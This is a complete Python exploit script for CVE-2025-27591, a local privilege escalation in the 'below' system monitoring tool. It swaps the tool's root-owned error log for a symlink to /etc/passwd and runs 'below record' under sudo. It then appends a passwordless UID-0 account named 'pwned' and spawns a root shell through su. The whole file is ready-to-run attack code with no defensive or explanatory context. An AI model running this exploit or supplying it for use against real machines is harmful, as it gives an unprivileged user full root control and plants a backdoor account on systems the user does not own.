#!/usr/bin/env python3
import os, subprocess, sys, time, pty

# Configuration  
log_DIR = "/var/log/below"
target_log = f"{log_DIR}/error_root.log"
user = "pwned"
malicious_entry = f"{user}::0:0:{user} user:/root:/bin/bash\n"

def create_symlink_attack():
    try:
        if os.path.exists(target_log):
            os.remove(target_log)
        os.symlink("/etc/passwd", target_log)
        return True
    except:
        return False

def trigger_service():
    try:
        subprocess.run(["sudo", "/usr/bin/below", "record"], timeout=40)
    except subprocess.TimeoutExpired:
        pass  
    except:
        pass

def write_payload():
    try:
        with open(target_log, "a") as f:
            f.write(malicious_entry)
        return True
    except:
        return False

def check_injection_success():
    try:
        with open("/etc/passwd", "r") as f:
            return user in f.read()
    except:
        return False

def exploit():
    print("[*] CVE-2025-27591 exploitation...")
    
    if not create_symlink_attack():
        print("[-] Symlink failed")
        return False
    
    trigger_service()
    
    if not write_payload():
        print("[-] Injection failed")
        return False
    
    if not check_injection_success():
        print("[-] User not found in /etc/passwd")
        return False
    
    print(f"[+] User {user} created successfully!")
    print("[*] Spawning root shell...")
    
    pty.spawn(["su", user])

if __name__ == "__main__":
    exploit()